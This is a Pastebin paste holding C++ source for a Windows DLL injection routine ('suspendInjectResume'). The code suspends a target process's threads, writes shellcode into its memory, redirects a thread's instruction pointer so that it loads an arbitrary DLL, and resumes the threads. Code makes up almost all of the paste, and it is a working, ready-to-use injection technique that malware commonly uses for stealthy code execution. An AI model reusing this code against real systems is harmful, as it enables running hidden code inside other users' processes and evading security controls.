Advertisement
libdo

Untitled

Oct 15th, 2017
216
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. CreateMethods.cpp
  3.  
  4. Contains the thread creation functions.
  5.  
  6. Currently implements:
  7.  
  8. 1. Suspend/Inject/Resume Method
  9. 2. ntCreateThreadEx()
  10. 3. RtlCreateUserThread()
  11. */
  12.  
  13.  
  14.  
  15. #include <windows.h>
  16. #include <stdio.h>
  17. #include <tlhelp32.h>
  18. #include "ExecThread.h"
  19. #include "AllocWriteDLL.h"
  20.  
  21. #ifndef _WIN64
  22. VOID suspendInjectResume(HANDLE hHandle, LPVOID loadLibAddr, LPVOID dllPathAddr) {
  23. /*
  24. This is a mixture from the following sites:
  25.  
  26. http://syprog.blogspot.com/2012/05/createremotethread-bypass-windows.html
  27. http://www.kdsbest.com/?p=159
  28. */
  29.  
  30. HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
  31. HANDLE hSnapshot2 = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
  32. HANDLE thread = NULL;
  33. THREADENTRY32 te;
  34. THREADENTRY32 te2;
  35.  
  36. CONTEXT ctx;
  37. DWORD firstThread = 0;
  38. HANDLE targetThread = NULL;
  39.  
  40. LPVOID scAddr;
  41.  
  42. int i;
  43.  
  44. unsigned char sc[] = {
  45. // Push all flags
  46. 0x9C,
  47. // Push all register
  48. 0x60,
  49. // Push 3,4,5,6 (dllPathAddr)
  50. 0x68, 0xAA, 0xAA, 0xAA, 0xAA,
  51. // Mov eax, 8,9,10, 11 (loadLibAddr)
  52. 0xB8, 0xBB, 0xBB, 0xBB, 0xBB,
  53. // Call eax
  54. 0xFF, 0xD0,
  55. // Pop all register
  56. 0x61,
  57. // Pop all flags
  58. 0x9D,
  59. // Ret
  60. 0xC3
  61. };
  62.  
  63. te.dwSize = sizeof(THREADENTRY32);
  64. te2.dwSize = sizeof(THREADENTRY32);
  65. ctx.ContextFlags = CONTEXT_FULL;
  66.  
  67. sc[3] = ((unsigned int) dllPathAddr & 0xFF);
  68. sc[4] = (((unsigned int) dllPathAddr >> 8 )& 0xFF);
  69. sc[5] = (((unsigned int) dllPathAddr >> 16 )& 0xFF);
  70. sc[6] = (((unsigned int) dllPathAddr >> 24 )& 0xFF);
  71.  
  72. sc[8] = ((unsigned int) loadLibAddr & 0xFF);
  73. sc[9] = (((unsigned int) loadLibAddr >> 8 )& 0xFF);
  74. sc[10] = (((unsigned int) loadLibAddr >> 16 )& 0xFF);
  75. sc[11] = (((unsigned int) loadLibAddr >> 24 )& 0xFF);
  76.  
  77.  
  78.  
  79. // Suspend Threads
  80. if(Thread32First(hSnapshot, &te)) {
  81. do {
  82. if(te.th32OwnerProcessID == GetProcessId(hHandle)) {
  83. if ( firstThread == 0 )
  84. firstThread = te.th32ThreadID;
  85. thread = OpenThread(THREAD_ALL_ACCESS | THREAD_GET_CONTEXT, FALSE, te.th32ThreadID);
  86. if(thread != NULL) {
  87. printf("t[+] Suspending Thread 0x%08xn", te.th32ThreadID);
  88. SuspendThread(thread);
  89. CloseHandle(thread);
  90. } else {
  91. printf("t[+] Could not open thread!n");
  92. }
  93. }
  94. } while(Thread32Next(hSnapshot, &te));
  95. } else {
  96. printf("t[+] Could not Thread32First! [%d]n", GetLastError());
  97. CloseHandle(hSnapshot);
  98. exit(-1);
  99. }
  100. CloseHandle(hSnapshot);
  101.  
  102. printf("t[+] Our Launcher Code:nt");
  103. for (i=0; i<17; i++)
  104. printf("%02x ",sc[i]);
  105. printf("n");
  106. // Get/Save EIP, Inject
  107. printf("t[+] Targeting Thread 0x%08xn",firstThread);
  108. targetThread = OpenThread(THREAD_ALL_ACCESS, FALSE, firstThread);
  109. if (GetThreadContext(targetThread, &ctx) == 0)
  110. printf("[!] GetThreadContext Failed!n");
  111. printf("t[+] Current Registers: nttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);
  112.  
  113. printf("t[+] Saving EIP for our returnn");
  114. ctx.Esp -= sizeof(unsigned int);
  115. WriteProcessMemory(hHandle, (LPVOID)ctx.Esp, (LPCVOID)&ctx.Eip, sizeof(unsigned int), NULL);
  116. printf("ttEIP[0x%08x] ESP[0x%08x] EBP[0x%08x]n", ctx.Eip, ctx.Esp, ctx.Ebp);
  117.  
  118. scAddr = VirtualAllocEx(hHandle, NULL, 17, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  119. printf("t[+] Allocating 17 bytes for our Launcher Code [0x%08x][%d]n", scAddr, GetLastError());
  120.  
  121. printf ("t[+] Writing Launcher Code into targetThread [%d]n", WriteProcessMemory(hHandle, scAddr, (LPCVOID)sc, 17, NULL));
  122.  
  123. printf("t[+] Setting EIP to LauncherCoden");
  124. ctx.Eip = (DWORD)scAddr;
  125. printf("ttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);
  126.  
  127. if (SetThreadContext(targetThread, &ctx) == 0)
  128. printf("[!] SetThreadContext Failed!n");
  129.  
  130. // Resume Threads
  131. hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
  132. te.dwSize = sizeof(THREADENTRY32);
  133.  
  134. if(Thread32First(hSnapshot2, &te2)) {
  135. do {
  136. if(te2.th32OwnerProcessID == GetProcessId(hHandle)) {
  137. thread = OpenThread(THREAD_ALL_ACCESS | THREAD_GET_CONTEXT, FALSE, te2.th32ThreadID);
  138. if(thread != NULL) {
  139. printf("t[+] Resuming Thread 0x%08xn", te2.th32ThreadID);
  140. ResumeThread(thread);
  141. if (te2.th32ThreadID == firstThread)
  142. WaitForSingleObject(thread, 5000);
  143. CloseHandle(thread);
  144. } else {
  145. printf("t[+] Could not open thread!n");
  146. }
  147. }
  148. } while(Thread32Next(hSnapshot2, &te2));
  149. } else {
  150. printf("t[+] Could not Thread32First! [%d]n", GetLastError());
  151. CloseHandle(hSnapshot2);
  152. exit(-1);
  153. }
  154. CloseHandle(hSnapshot2);
  155. }
  156. #endif
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement